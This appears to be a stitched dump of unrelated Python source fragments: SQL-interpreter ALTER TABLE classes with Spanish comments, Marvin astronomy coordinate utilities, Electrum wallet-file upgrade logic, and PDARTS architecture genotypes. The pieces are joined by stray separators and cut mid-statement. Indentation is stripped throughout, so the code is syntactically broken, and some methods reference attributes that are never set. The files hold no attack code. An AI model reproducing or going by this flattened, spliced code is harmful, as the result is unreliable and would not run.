if not TRef.columnExist(DB_ACTUAL.getName(),self.tabla,self.accion.nombre):
return ErrorReport('Semantico', sqlErrors.sqlErrorToString(sqlErrors.sql_error_syntax_error_or_access_rule_violation.invalid_column_reference), 0)
elif TRef.constraintExist(DB_ACTUAL.getName(),self.accion.accion):
return ErrorReport('Semantico', sqlErrors.sqlErrorToString(sqlErrors.sql_error_integrity_constraint_violation.integrity_constraint_violation), 0)
elif TRef.getAttribute(DB_ACTUAL.getName(),self.tabla,self.accion.nombre, 'UniqueConst') != None:
return ErrorReport('Semantico', sqlErrors.sqlErrorToString(sqlErrors.sql_error_integrity_constraint_violation.integrity_constraint_violation), 0)
TRef.alterField(DB_ACTUAL.getName(), self.tabla, self.accion.nombre, 'UniqueConst', self.accion.accion)
TRef.alterField(DB_ACTUAL.getName(), self.tabla, self.accion.nombre, 'Unique', True)
return 'Alter table complete'
# Alter Field: Cambia al tipo varchar o cambia ser nulo
class AlterField(Instruccion):
def __init__(self, campo, cantidad = None):
self.campo = campo
self.cantidad = cantidad
def dibujar(self):
identificador = str(hash(self))
nodo = "\n" + identificador
if self.cantidad:
nodo += "[ label = \"ALTER COLUMN " + self.campo + " TYPE\" ];"
nodo += "\nTYPE" + identificador + "[ label = \"VARCHAR(" + str(self.cantidad) + ")\" ];"
nodo += "\n" + identificador + " -> TYPE" + identificador + ";\n"
else:
nodo += "[ label = \"ALTER COLUMN " + self.campo + " SET\" ];"
nodo += "\nVALUE" + identificador + "[ label = \"NOT NULL\" ];"
nodo += "\n" + identificador + " -> VALUE" + identificador + ";\n"
return nodo
def ejecutar(self, ts):
# Verificar si existe la columna
if self.cantidad:
if isinstance(self.cantidad, int):
if self.cantidad < 0:
return ErrorReport('Semantico', sqlErrors.sqlErrorToString(sqlErrors.sql_error_data_exception.numeric_value_out_of_range),0)
return self.cantidad
elif isinstance(self.cantidad, tuple):
return self.cantidad
elif isinstance(self.cantidad, str):
return self.cantidad
else:
return self.cantidad.value
else:
return False
# Alter Table Drop: Encapsula tanto constraints como columna
class AlterTableDrop(Instruccion):
def __init__(self, nombre, tipo):
self.nombre = nombre
self.tipo = tipo
def dibujar(self):
identificador = str(hash(self))
nodo = "\n" + identificador
if self.tipo == ALTER_TABLE_DROP.CONSTRAINT:
nodo += "[ label = \"DROP CONSTRAINT\" ];"
else:
nodo += "[ label = \"DROP COLUMN\" ];"
nodo += "\nNAME" + identificador + "[ label = \"" + self.nombre + "\" ];"
nodo += "\n" + identificador + " -> NAME" + identificador + ";\n"
return nodo
def ejecutar(self, ts):
return self.nombre
# Alter add
class AlterTableAdd(Instruccion):
def __init__(self, nombre, tipo, accion):
self.nombre = nombre
self.tipo = tipo
self.accion = accion
def dibujar(self):
identificador = str(hash(self))
nodo = "\n" + identificador
if self.tipo == ALTER_TABLE_ADD.UNIQUE:
nodo += "[ label = \"ADD UNIQUE " + self.nombre + "\" ];"
nodo += "\nNAME" + identificador + "[ label = \"" + self.nombre + "\" ];"
nodo += "\n" + identificador + " -> NAME" + identificador + ";"
nodo += "\nID" + identificador + "[ label = \"" + self.accion + "\" ];"
nodo += "\n" + identificador + " -> ID" + identificador + ";\n"
elif self.tipo == ALTER_TABLE_ADD.FOREIGN_KEY:
nodo += "[ label = \"ADD CONSTRAINT " + self.nombre + " FOREIGN KEY\" ];"
nodo += "\n" + identificador + " -> " + str(hash(self.accion[0])) +"\n"
nodo += "\n" + str(hash(self.accion[0])) + "[ label = \"" + self.accion[0] + "." + self.accion[1] + "\" ]"
nodo += "\n" + identificador + " -> " + str(hash(self.accion[2])) +"\n"
nodo += "\n" + str(hash(self.accion[2])) + "[ label = \"CONSTRAINT: " + self.accion[2] + "\" ]"
elif self.tipo == ALTER_TABLE_ADD.MULTI_FOREIGN_KEY:
nodo += "[ label = \"ADD FOREIGN KEY\" ];"
for local in self.nombre:
nodo += "\n" + str(hash(local)) + "[ label =\"" + local + "\" ];"
nodo += "\n" + identificador + " -> " + str(hash(local)) + ";"
nodo += "\nTABLA" + identificador + "[ label = \"" + self.accion[0] + "\" ];"
nodo += "\n" + identificador + " -> TABLA" + identificador + ";"
for foraneo in self.accion[1]:
nodo += "\n" + str(hash(foraneo)) + "[ label =\"" + foraneo + "\" ];"
nodo += "\nTABLA" + identificador + " -> " + str(hash(foraneo)) + ";"
elif self.tipo == ALTER_TABLE_ADD.CHECKS:
nodo += "[ label = \"ADD CHECKS\" ]"
nodo += "\nNAME" + identificador + "[ label = \"" + self.nombre + "\" ];"
nodo += "\n" + identificador + " -> NAME" + identificador + ";"
nodo += "\nACTION" + identificador + "[ label = \"" + self.accion + "\" ];"
nodo += "\n" + identificador + " -> ACTION" + identificador + ";\n"
else:
aux = self.accion
if isinstance(self.accion, tuple):
aux = self.accion[0].value
if isinstance(self.accion[1], tuple):
aux += "(" + str(self.accion[1][0]) + "," + str(self.accion[1][1]) + ")"
else:
aux += "(" + str(self.accion[1]) + ")"
elif isinstance(self.accion, str):
pass
else:
aux = self.accion.value
nodo += "[ label = \"ADD COLUMN " + self.nombre + " " + aux + "\" ];"
return nodo
def ejecutar(self, ts):
if self.tipo == ALTER_TABLE_ADD.FOREIGN_KEY:
if TRef.constraintExist(DB_ACTUAL.getName(),self.accion[2]):
return ErrorReport('Semantico', sqlErrors.sqlErrorToString(sqlErrors.sql_error_integrity_constraint_violation.integrity_constraint_violation), 0)
if not TRef.tableExist(DB_ACTUAL.getName(),self.accion[0]):
return ErrorReport('Semantico', sqlErrors.sqlErrorToString(sqlErrors.sql_error_fdw_error.fdw_table_not_found), 0)
if not TRef.columnExist(DB_ACTUAL.getName(), self.accion[0], self.accion[1]):
return ErrorReport('Semantico', sqlErrors.sqlErrorToString(sqlErrors.sql_error_fdw_error.fdw_invalid_column_number), 0)
return (self.nombre,self.accion[0],self.accion[1],self.accion[2])
elif self.tipo == ALTER_TABLE_ADD.MULTI_FOREIGN_KEY:
if not TRef.tableExist(DB_ACTUAL.getName(),self.accion[0]):
return ErrorReport('Semantico', sqlErrors.sqlErrorToString(sqlErrors.sql_error_fdw_error.fdw_table_not_found), 0)
#Comparamos que la misma cantidad de ids propios sea igual a la foranea
if len(self.nombre) != len(self.accion[1]):
return ErrorReport('Semantico', sqlErrors.sqlErrorToString(sqlErrors.sql_error_data_exception.data_exception), 0)
for col in self.accion[1]:
if not TRef.columnExist(DB_ACTUAL.getName(), self.accion[0], col):
return ErrorReport('Semantico', sqlErrors.sqlErrorToString(sqlErrors.sql_error_fdw_error.fdw_invalid_column_number), 0)
listaSin = list()
for i in range(len(self.nombre)):
listaSin.append( (self.nombre[i], self.accion[0], self.accion[1][i]) )
return listaSin
elif self.tipo == ALTER_TABLE_ADD.COLUMN:
if isinstance(self.accion, tuple):
if self.accion[1] < 1:
return ErrorReport('Semantico', sqlErrors.sqlErrorToString(sqlErrors.sql_error_data_exception.numeric_value_out_of_range), 0)
elif isinstance(self.accion, str):
#Comprobamos que el type a elegir exista
if not TEnum.enumExist(self.accion):
return ErrorReport('Semantico', sqlErrors.sqlErrorToString(sqlErrors.sql_error_syntax_error_or_access_rule_violation.indeterminate_datatype), 0)
return (self.nombre, self.accion)
# Show Database
class ShowDatabase(Instruccion):
def __init__(self, like = None):
self.like = like
def dibujar(self):
identificador = str(hash(self))
nodo = "\n" + identificador + "[ label = \"SHOW DATABASE\" ];"
nodo += "\nNAME" + identificador + "[ label = \"" + self.db + "\" ];"
nodo += "\n" + identificador + " -> NAME" + identificador + ";"
if self.like:
nodo += "\nLIKE" + identificador + "[ label = \"" + self.like + "\" ];"
nodo += "\n" + identificador + " -> LIKE" + identificador + ";"
return nodo
def ejecutar(self, ts):
display = 'Databases\n---------------------\n'
databases = TRef.showDatabases()
for db in databases:
display += db + '\n'
return display
# Drop Database
class DropDatabase(Instruccion):
def __init__(self, db, existencia = False):
self.db = db
self.existencia = existencia
def dibujar(self):
identificador = str(hash(self))
nodo = "\n" + identificador + "[ label = \"DROP DATABASE " + self.db + "\" ];"
if self.existencia:
nodo += "\nLIKE" + identificador + "[ label = \"IF | |
<reponame>duc90/marvin
#!/usr/bin/env python
# encoding: utf-8
#
# @Author: <NAME>
# @Date: Nov 1, 2017
# @Filename: general.py
# @License: BSD 3-Clause
# @Copyright: <NAME>
from __future__ import division
from __future__ import print_function
from __future__ import absolute_import
import collections
import inspect
import sys
import warnings
import contextlib
import re
from collections import OrderedDict
from builtins import range
import numpy as np
from scipy.interpolate import griddata
import matplotlib.pyplot as plt
import PIL
from astropy import table
from astropy import wcs
from astropy.units.quantity import Quantity
import marvin
from marvin import log
from marvin.core.exceptions import MarvinError, MarvinUserWarning
from marvin.utils.datamodel.dap.plotting import get_default_plot_params
try:
from sdss_access import RsyncAccess, AccessError
except ImportError as e:
RsyncAccess = None
try:
from sdss_access.path import Path
except ImportError as e:
Path = None
try:
import pympler.summary
import pympler.muppy
import psutil
except ImportError as e:
pympler = None
psutil = None
# General utilities
__all__ = ('convertCoords', 'parseIdentifier', 'mangaid2plateifu', 'findClosestVector',
'getWCSFromPng', 'convertImgCoords', 'getSpaxelXY',
'downloadList', 'getSpaxel', 'get_drpall_row', 'getDefaultMapPath',
'getDapRedux', 'get_nsa_data', '_check_file_parameters', 'get_plot_params',
'invalidArgs', 'missingArgs', 'getRequiredArgs', 'getKeywordArgs',
'isCallableWithArgs', 'map_bins_to_column', '_sort_dir',
'get_dapall_file', 'temp_setattr', 'map_dapall', 'turn_off_ion', 'memory_usage')
drpTable = {}
def getSpaxel(cube=True, maps=True, modelcube=True,
x=None, y=None, ra=None, dec=None, xyorig=None, **kwargs):
"""Returns the |spaxel| matching certain coordinates.
The coordinates of the spaxel to return can be input as ``x, y`` pixels
relative to``xyorig`` in the cube, or as ``ra, dec`` celestial
coordinates.
This function is intended to be called by
:func:`~marvin.tools.cube.Cube.getSpaxel` or
:func:`~marvin.tools.maps.Maps.getSpaxel`, and provides shared code for
both of them.
Parameters:
cube (:class:`~marvin.tools.cube.Cube` or None or bool)
A :class:`~marvin.tools.cube.Cube` object with the DRP cube
data from which the spaxel spectrum will be extracted. If None,
the |spaxel| object(s) returned won't contain spectral information.
maps (:class:`~marvin.tools.maps.Maps` or None or bool)
As ``cube`` but for the :class:`~marvin.tools.maps.Maps`
object representing the DAP maps entity. If None, the |spaxel|
will be returned without DAP information.
modelcube (:class:`~marvin.tools.modelcube.ModelCube` or None or bool)
As ``cube`` but for the :class:`~marvin.tools.modelcube.ModelCube`
object representing the DAP modelcube entity. If None, the |spaxel|
will be returned without model information.
x,y (int or array):
The spaxel coordinates relative to ``xyorig``. If ``x`` is an
array of coordinates, the size of ``x`` must much that of
``y``.
ra,dec (float or array):
The coordinates of the spaxel to return. The closest spaxel to
those coordinates will be returned. If ``ra`` is an array of
coordinates, the size of ``ra`` must much that of ``dec``.
xyorig ({'center', 'lower'}):
The reference point from which ``x`` and ``y`` are measured.
Valid values are ``'center'``, for the centre of the
spatial dimensions of the cube, or ``'lower'`` for the
lower-left corner. This keyword is ignored if ``ra`` and
``dec`` are defined. ``xyorig`` defaults to
``marvin.config.xyorig.``
kwargs (dict):
Arguments to be passed to `~marvin.tools.spaxel.SpaxelBase`.
Returns:
spaxels (list):
The |spaxel| objects for this cube/maps corresponding to the input
coordinates. The length of the list is equal to the number
of input coordinates.
.. |spaxel| replace:: :class:`~marvin.tools.spaxel.Spaxel`
"""
# TODO: for now let's put these imports here, but we should fix the
# circular imports soon.
import marvin.tools.cube
import marvin.tools.maps
import marvin.tools.modelcube
import marvin.tools.spaxel
# Checks that the cube and maps data are correct
assert cube or maps or modelcube, \
'Either cube, maps, or modelcube needs to be specified.'
assert isinstance(cube, (marvin.tools.cube.Cube, bool)), \
'cube is not an instance of Cube or a boolean'
assert isinstance(maps, (marvin.tools.maps.Maps, bool)), \
'maps is not an instance of Maps or a boolean'
assert isinstance(modelcube, (marvin.tools.modelcube.ModelCube, bool)), \
'modelcube is not an instance of ModelCube or a boolean'
# Checks that we have the correct set of inputs.
if x is not None or y is not None:
assert ra is None and dec is None, 'Either use (x, y) or (ra, dec)'
assert x is not None and y is not None, 'Specify both x and y'
inputMode = 'pix'
isScalar = np.isscalar(x)
x = np.atleast_1d(x)
y = np.atleast_1d(y)
coords = np.array([x, y], np.float).T
elif ra is not None or dec is not None:
assert x is None and y is None, 'Either use (x, y) or (ra, dec)'
assert ra is not None and dec is not None, 'Specify both ra and dec'
inputMode = 'sky'
isScalar = np.isscalar(ra)
ra = np.atleast_1d(ra)
dec = np.atleast_1d(dec)
coords = np.array([ra, dec], np.float).T
else:
raise ValueError('You need to specify either (x, y) or (ra, dec)')
if not xyorig:
xyorig = marvin.config.xyorig
if isinstance(maps, marvin.tools.maps.Maps):
ww = maps.wcs if inputMode == 'sky' else None
cube_shape = maps._shape
elif isinstance(cube, marvin.tools.cube.Cube):
ww = cube.wcs if inputMode == 'sky' else None
cube_shape = cube._shape
elif isinstance(modelcube, marvin.tools.modelcube.ModelCube):
ww = modelcube.wcs if inputMode == 'sky' else None
cube_shape = modelcube._shape
iCube, jCube = zip(convertCoords(coords, wcs=ww, shape=cube_shape,
mode=inputMode, xyorig=xyorig).T)
_spaxels = []
for ii in range(len(iCube[0])):
_spaxels.append(
marvin.tools.spaxel.SpaxelBase(jCube[0][ii], iCube[0][ii],
cube=cube, maps=maps, modelcube=modelcube,
**kwargs))
if len(_spaxels) == 1 and isScalar:
return _spaxels[0]
else:
return _spaxels
def convertCoords(coords, mode='sky', wcs=None, xyorig='center', shape=None):
"""Convert input coordinates to array indices.
Converts input positions in x, y or RA, Dec coordinates to array indices
(in Numpy style) or spaxel extraction. In case of pixel coordinates, the
origin of reference (either the center of the cube or the lower left
corner) can be specified via ``xyorig``.
If ``shape`` is defined (mandatory for ``mode='pix'``, optional for
``mode='sky'``) and one or more of the resulting indices are outside the
size of the input shape, an error is raised.
This functions is mostly intended for internal use.
Parameters:
coords (array):
The input coordinates, as an array of shape Nx2.
mode ({'sky', 'pix'}:
The type of input coordinates, either `'sky'` for celestial
coordinates (in the format defined in the WCS header information),
or `'pix'` for pixel coordinates.
wcs (None or ``astropy.wcs.WCS`` object):
If ``mode='sky'``, the WCS solution from which the cube coordinates
can be derived.
xyorig (str):
If ``mode='pix'``, the reference point from which the coordinates
are measured. Valid values are ``'center'``, for the centre of the
spatial dimensions of the cube, or ``'lower'`` for the lower-left
corner.
shape (None or array):
If ``mode='pix'``, the shape of the spatial dimensions of the cube,
so that the central position can be calculated.
Returns:
result (Numpy array):
An array with the same shape as ``coords``, containing the cube
index positions for the input coordinates, in Numpy style (i.e.,
the first element being the row and the second the column).
"""
coords = np.atleast_2d(coords)
assert coords.shape[1] == 2, 'coordinates must be an array Nx2'
if mode == 'sky':
assert wcs, 'if mode==sky, wcs must be defined.'
coordsSpec = np.ones((coords.shape[0], 3), np.float32)
coordsSpec[:, :-1] = coords
cubeCoords = wcs.wcs_world2pix(coordsSpec, 0)
cubeCoords = np.fliplr(np.array(np.round(cubeCoords[:, :-1]), np.int))
elif mode in ['pix', 'pixel']:
assert xyorig, 'if mode==pix, xyorig must be defined.'
x = coords[:, 0]
y = coords[:, 1]
assert shape is not None, 'if mode==pix, shape must be defined.'
shape = np.atleast_1d(shape)
if xyorig == 'center':
yMid, xMid = shape / 2.
xCube = np.round(xMid + x)
yCube = np.round(yMid + y)
elif xyorig == 'lower':
xCube = np.round(x)
yCube = np.round(y)
else:
raise ValueError('xyorig must be center or lower.')
cubeCoords = np.array([yCube, xCube], np.int).T
else:
raise ValueError('mode must be pix or sky.')
if shape is not None:
if ((cubeCoords < 0).any() or
(cubeCoords[:, 0] > (shape[0] - 1)).any() or
(cubeCoords[:, 1] > (shape[1] - 1)).any()):
raise MarvinError('some indices are out of limits.'
'``xyorig`` is currently set to "{0}". '
'Try setting ``xyorig`` to "{1}".'
.format(xyorig, 'center' if xyorig is 'lower' else 'lower'))
return cubeCoords
def mangaid2plateifu(mangaid, mode='auto', drpall=None, drpver=None):
"""Return the plate-ifu for a certain mangaid.
Uses either the DB or the drpall file to determine the plate-ifu for
a mangaid. If more than one plate-ifu are available for a certain ifu,
and ``mode='drpall'``, the one with the higher SN2 (calculated as the sum
of redSN2 and blueSN2) will be used. If ``mode='db'``, the most recent one
will be used.
Parameters:
mangaid (str):
The mangaid for which the plate-ifu will be returned.
mode ({'auto', 'drpall', 'db', 'remote'}):
If `'drpall'` or ``'db'``, the drpall file or the local database,
respectively, will be used. If ``'remote'``, a request to the API
will be | |
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2015 <NAME>
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import ast
import json
import copy
import threading
from .address import Address
from . import bitcoin
from .keystore import bip44_derivation_btc
from . import util
from .util import PrintError, WalletFileException, multisig_type, profiler
# seed_version is now used for the version of the wallet file
OLD_SEED_VERSION = 4 # electrum versions < 2.0
NEW_SEED_VERSION = 11 # electrum versions >= 2.0
FINAL_SEED_VERSION = 17 # electrum >= 2.7 will set this to prevent
# old versions from overwriting new format
class JsonDB(PrintError):
def __init__(self, raw, *, manual_upgrades):
self.lock = threading.RLock()
self.data = {}
self._modified = False
self.manual_upgrades = manual_upgrades
if raw:
self.load_data(raw)
else:
self.put('seed_version', FINAL_SEED_VERSION)
self.output_pretty_json: bool = True
def set_output_pretty_json(self, flag: bool):
self.output_pretty_json = flag
def set_modified(self, b):
with self.lock:
self._modified = b
def modified(self):
return self._modified
def modifier(func):
def wrapper(self, *args, **kwargs):
with self.lock:
self._modified = True
return func(self, *args, **kwargs)
return wrapper
def locked(func):
def wrapper(self, *args, **kwargs):
with self.lock:
return func(self, *args, **kwargs)
return wrapper
@locked
def get(self, key, default=None):
v = self.data.get(key)
if v is None:
v = default
else:
v = copy.deepcopy(v)
return v
@modifier
def put(self, key, value) -> bool:
try:
json.dumps(key, cls=util.MyEncoder)
json.dumps(value, cls=util.MyEncoder)
except:
self.print_error(f"json error: cannot save {repr(key)} ({repr(value)})")
return False
if value is not None:
if self.data.get(key) != value:
self.data[key] = copy.deepcopy(value)
return True
elif key in self.data:
self.data.pop(key)
return True
return False
def commit(self):
pass
@locked
def dump(self):
return json.dumps(
self.data,
indent=4 if self.output_pretty_json else None,
sort_keys=self.output_pretty_json,
cls=util.MyEncoder
)
def load_data(self, s):
try:
self.data = json.loads(s)
except:
try:
d = ast.literal_eval(s)
labels = d.get('labels', {})
except Exception as e:
raise IOError("Cannot read wallet file")
self.data = {}
for key, value in d.items():
try:
json.dumps(key)
json.dumps(value)
except:
self.print_error('Failed to convert label to json format', key)
continue
self.data[key] = value
if not isinstance(self.data, dict):
raise WalletFileException("Malformed wallet file (not dict)")
if not self.manual_upgrades:
if self.requires_split():
raise WalletFileException("This wallet has multiple accounts and must be split")
if self.requires_upgrade():
self.upgrade()
def requires_split(self):
d = self.get('accounts', {})
return len(d) > 1
def split_accounts(self):
result = []
# backward compatibility with old wallets
d = self.get('accounts', {})
if len(d) < 2:
return
wallet_type = self.get('wallet_type')
if wallet_type == 'old':
assert len(d) == 2
data1 = copy.deepcopy(self.data)
data1['accounts'] = {'0': d['0']}
data1['suffix'] = 'deterministic'
data2 = copy.deepcopy(self.data)
data2['accounts'] = {'/x': d['/x']}
data2['seed'] = None
data2['seed_version'] = None
data2['master_public_key'] = None
data2['wallet_type'] = 'imported'
data2['suffix'] = 'imported'
result = [data1, data2]
elif wallet_type in ['bip44', 'trezor', 'keepkey', 'ledger', 'btchip', 'digitalbitbox']:
mpk = self.get('master_public_keys')
for k in d.keys():
bip44_account = int(k)
x = d[k]
if x.get("pending"):
continue
xpub = mpk[f"x/{bip44_account}'"]
new_data = copy.deepcopy(self.data)
# save account, derivation and xpub at index 0
new_data['accounts'] = {'0': x}
new_data['master_public_keys'] = {"x/0'": xpub}
new_data['derivation'] = bip44_derivation_btc(bip44_account)
new_data['suffix'] = k
result.append(new_data)
else:
raise WalletFileException("This wallet has multiple accounts and must be split")
return result
def requires_upgrade(self):
return self.get_seed_version() < FINAL_SEED_VERSION
@profiler
def upgrade(self):
self.print_error('upgrading wallet format')
self.convert_imported()
self.convert_wallet_type()
self.convert_account()
self.convert_version_13_b()
self.convert_version_14()
self.convert_version_15()
self.convert_version_16()
self.convert_version_17()
self.put('seed_version', FINAL_SEED_VERSION) # just to be sure
def convert_wallet_type(self):
if not self._is_upgrade_method_needed(0, 13):
return
wallet_type = self.get('wallet_type')
if wallet_type == 'btchip': wallet_type = 'ledger'
if self.get('keystore') or self.get('x1/') or wallet_type == 'imported':
return False
assert not self.requires_split()
seed_version = self.get_seed_version()
seed = self.get('seed')
xpubs = self.get('master_public_keys')
xprvs = self.get('master_private_keys', {})
mpk = self.get('master_public_key')
keypairs = self.get('keypairs')
key_type = self.get('key_type')
if seed_version == OLD_SEED_VERSION or wallet_type == 'old':
d = {
'type': 'old',
'seed': seed,
'mpk': mpk,
}
self.put('wallet_type', 'standard')
self.put('keystore', d)
elif key_type == 'imported':
d = {
'type': 'imported',
'keypairs': keypairs,
}
self.put('wallet_type', 'standard')
self.put('keystore', d)
elif wallet_type in ['xpub', 'standard']:
xpub = xpubs["x/"]
xprv = xprvs.get("x/")
d = {
'type': 'bip32',
'xpub': xpub,
'xprv': xprv,
'seed': seed,
}
self.put('wallet_type', 'standard')
self.put('keystore', d)
elif wallet_type in ['bip44']:
xpub = xpubs["x/0'"]
xprv = xprvs.get("x/0'")
d = {
'type': 'bip32',
'xpub': xpub,
'xprv': xprv,
}
self.put('wallet_type', 'standard')
self.put('keystore', d)
elif wallet_type in ['trezor', 'keepkey', 'ledger', 'digitalbitbox']:
xpub = xpubs["x/0'"]
derivation = self.get('derivation', bip44_derivation_btc(0))
d = {
'type': 'hardware',
'hw_type': wallet_type,
'xpub': xpub,
'derivation': derivation,
}
self.put('wallet_type', 'standard')
self.put('keystore', d)
elif multisig_type(wallet_type):
for key in xpubs.keys():
d = {
'type': 'bip32',
'xpub': xpubs[key],
'xprv': xprvs.get(key),
}
if key == 'x1/' and seed:
d['seed'] = seed
self.put(key, d)
else:
raise WalletFileException('Unable to tell wallet type. Is this even a wallet file?')
# remove junk
self.put('master_public_key', None)
self.put('master_public_keys', None)
self.put('master_private_keys', None)
self.put('derivation', None)
self.put('seed', None)
self.put('keypairs', None)
self.put('key_type', None)
def convert_version_13_b(self):
# version 13 is ambiguous, and has an earlier and a later structure
if not self._is_upgrade_method_needed(0, 13):
return
if self.get('wallet_type') == 'standard':
if self.get('keystore').get('type') == 'imported':
pubkeys = self.get('keystore').get('keypairs').keys()
d = {'change': []}
receiving_addresses = []
for pubkey in pubkeys:
addr = bitcoin.pubkey_to_address('p2pkh', pubkey)
receiving_addresses.append(addr)
d['receiving'] = receiving_addresses
self.put('addresses', d)
self.put('pubkeys', None)
self.put('seed_version', 13)
def convert_version_14(self):
# convert imported wallets for 3.0
if not self._is_upgrade_method_needed(13, 13):
return
if self.get('wallet_type') =='imported':
addresses = self.get('addresses')
if type(addresses) is list:
addresses = dict([(x, None) for x in addresses])
self.put('addresses', addresses)
elif self.get('wallet_type') == 'standard':
if self.get('keystore').get('type')=='imported':
addresses = set(self.get('addresses').get('receiving'))
pubkeys = self.get('keystore').get('keypairs').keys()
assert len(addresses) == len(pubkeys)
d = {}
for pubkey in pubkeys:
addr = bitcoin.pubkey_to_address('p2pkh', pubkey)
assert addr in addresses
d[addr] = {
'pubkey': pubkey,
'redeem_script': None,
'type': 'p2pkh'
}
self.put('addresses', d)
self.put('pubkeys', None)
self.put('wallet_type', 'imported')
self.put('seed_version', 14)
def convert_version_15(self):
if not self._is_upgrade_method_needed(14, 14):
return
self.put('seed_version', 15)
def convert_version_16(self):
# fixes issue #3193 for imported address wallets
# also, previous versions allowed importing any garbage as an address
# which we now try to remove, see pr #3191
if not self._is_upgrade_method_needed(15, 15):
return
def remove_address(addr):
def remove_from_dict(dict_name):
d = self.get(dict_name, None)
if d is not None:
d.pop(addr, None)
self.put(dict_name, d)
def remove_from_list(list_name):
lst = self.get(list_name, None)
if lst is not None:
s = set(lst)
s -= {addr}
self.put(list_name, list(s))
# note: we don't remove 'addr' from self.get('addresses')
remove_from_dict('addr_history')
remove_from_dict('labels')
remove_from_dict('payment_requests')
remove_from_list('frozen_addresses')
if self.get('wallet_type') == 'imported':
addresses = self.get('addresses')
assert isinstance(addresses, dict)
addresses_new = dict()
for address, details in addresses.items():
if not Address.is_valid(address):
remove_address(address)
continue
if details is None:
addresses_new[address] = {}
else:
addresses_new[address] = details
self.put('addresses', addresses_new)
self.put('seed_version', 16)
def convert_version_17(self):
if not self._is_upgrade_method_needed(16, 16):
return
if self.get('wallet_type') == 'imported':
addrs = self.get('addresses')
if all(v for v in addrs.values()):
self.put('wallet_type', 'imported_privkey')
else:
self.put('wallet_type', 'imported_addr')
def convert_imported(self):
if not self._is_upgrade_method_needed(0, 13):
return
# '/x' is the internal ID for imported accounts
d = self.get('accounts', {}).get('/x', {}).get('imported',{})
if not d:
return False
addresses = []
keypairs = {}
for addr, v in d.items():
pubkey, privkey = v
if privkey:
keypairs[pubkey] = privkey
else:
addresses.append(addr)
if addresses and keypairs:
raise WalletFileException('mixed addresses and privkeys')
elif addresses:
self.put('addresses', addresses)
self.put('accounts', None)
elif keypairs:
self.put('wallet_type', 'standard')
self.put('key_type', 'imported')
self.put('keypairs', keypairs)
self.put('accounts', None)
else:
raise WalletFileException('no addresses or privkeys')
def convert_account(self):
if not self._is_upgrade_method_needed(0, 13):
return
self.put('accounts', None)
def _is_upgrade_method_needed(self, min_version, max_version):
cur_version = self.get_seed_version()
if cur_version > max_version:
return False
elif cur_version < min_version:
raise WalletFileException(
'storage upgrade: unexpected version | |
('sep_conv_3x3', 1),
('skip_connect', 0),
('sep_conv_5x5', 1)],
normal_concat=range(2, 6),
reduce=[('avg_pool_3x3', 0),
('avg_pool_3x3', 1),
('avg_pool_3x3', 0),
('skip_connect', 2),
('skip_connect', 2),
('max_pool_3x3', 0),
('avg_pool_3x3', 0),
('skip_connect', 2)],
reduce_concat=range(2, 6))
PDARTS_TS_CIFAR100_GAMMA_2 = Genotype(normal=[('sep_conv_3x3', 0), ('sep_conv_3x3', 1), ('skip_connect', 0), ('sep_conv_3x3', 2), ('skip_connect', 0), ('sep_conv_3x3', 2), ('sep_conv_3x3', 0), ('sep_conv_3x3', 2)], normal_concat=range(2, 6), reduce=[('avg_pool_3x3', 0), ('avg_pool_3x3', 1), ('avg_pool_3x3', 0), ('dil_conv_5x5', 2), ('avg_pool_3x3', 0), ('sep_conv_5x5', 2), ('avg_pool_3x3', 0), ('sep_conv_5x5', 4)], reduce_concat=range(2, 6))
PDARTS_TS_CIFAR100_GAMMA_3 = Genotype(normal=[('sep_conv_3x3', 0), ('dil_conv_3x3', 1), ('skip_connect', 0), ('sep_conv_3x3', 1), ('skip_connect', 0), ('dil_conv_5x5', 2), ('sep_conv_3x3', 0), ('dil_conv_5x5', 1)], normal_concat=range(2, 6), reduce=[('skip_connect', 0), ('max_pool_3x3', 1), ('skip_connect', 0), ('sep_conv_3x3', 1), ('avg_pool_3x3', 0), ('dil_conv_5x5', 3), ('dil_conv_3x3', 3), ('dil_conv_3x3', 4)], reduce_concat=range(2, 6))
PDARTS_TS_CIFAR100_GAMMA_0_1 = Genotype(normal=[('sep_conv_3x3', 0), ('sep_conv_3x3', 1), ('skip_connect', 0), ('dil_conv_3x3', 2), ('skip_connect', 0), ('sep_conv_3x3', 2), ('sep_conv_3x3', 0), ('dil_conv_3x3', 3)], normal_concat=range(2, 6), reduce=[('avg_pool_3x3', 0), ('dil_conv_5x5', 1), ('avg_pool_3x3', 0), ('sep_conv_3x3', 2), ('dil_conv_5x5', 2), ('dil_conv_3x3', 3), ('avg_pool_3x3', 0), ('sep_conv_5x5', 2)], reduce_concat=range(2, 6))
PDARTS_TS_CIFAR100_GAMMA_0_5 = Genotype(normal=[('sep_conv_3x3', 0), ('sep_conv_3x3', 1), ('skip_connect', 0), ('sep_conv_3x3', 1), ('sep_conv_3x3', 0), ('skip_connect', 2), ('sep_conv_3x3', 1), ('sep_conv_5x5', 4)], normal_concat=range(2, 6), reduce=[('sep_conv_3x3', 0), ('skip_connect', 1), ('avg_pool_3x3', 0), ('sep_conv_3x3', 2), ('avg_pool_3x3', 0), ('sep_conv_3x3', 1), ('avg_pool_3x3', 0), ('dil_conv_5x5', 2)], reduce_concat=range(2, 6))
